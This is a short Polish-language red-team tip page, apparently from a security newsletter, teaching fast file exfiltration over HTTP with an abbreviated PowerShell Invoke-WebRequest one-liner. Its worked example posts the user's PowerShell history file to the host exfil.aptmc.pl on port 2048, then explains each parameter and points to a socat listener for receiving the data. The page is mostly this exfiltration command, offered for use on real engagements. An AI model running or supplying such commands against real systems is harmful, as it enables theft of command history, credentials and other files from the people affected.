alphasec
PowerShell protip 001a
in 𝕏

Szybka eksfiltracja pliku po HTTP

tty1 · powershell
PS> iwr -me po -i <plik> http://<host:port>
#Powershell#RedTeam#Exfil

iwr to dobrze już nam znany Invoke-WebRequest, do tego brzydko skracamy jego parametry a nawet wartości, czyli:

Żeby więc na przykład wyeksfiltrować historię Powershella na port 2048 hosta exfil.aptmc.pl moglibyśmy zrobić:

        iwr -me po -i (Get-PSReadLineOption).HistorySavePath http://exfil.aptmc.pl:2048

Jak to działa — krok po kroku

Rozłóżmy onelinera na czynniki pierwsze:

-me po

metoda POST, bez skracania byłoby -method post; możemy również użyć PUT (-me pu)

-i <plik>

wyślij zawartość wskazanego pliku ( -InFile <plik>)

http://<host:port>

docelowy host i port, nawet nie mnusi być to pełnoprawny serwer HTTP, wystarczy prosty listener, np. ten z aptm.in/protip/001b

Przydatne linki

# aptm.in/protip/001b przykładowy TCP listener z wykorzytaniem socata protip ↗
← poprzedni protip 0019 ••• Wszystkie protipy następny → protip 001b
// subskrybuj

Nowe protipy prosto na maila.

Mięsiste jednolinijkowce i triki z prawdziwych zleceń. Zero spamu, zero teorii. Wypisujesz się jednym kliknięciem.

wersja newslettera: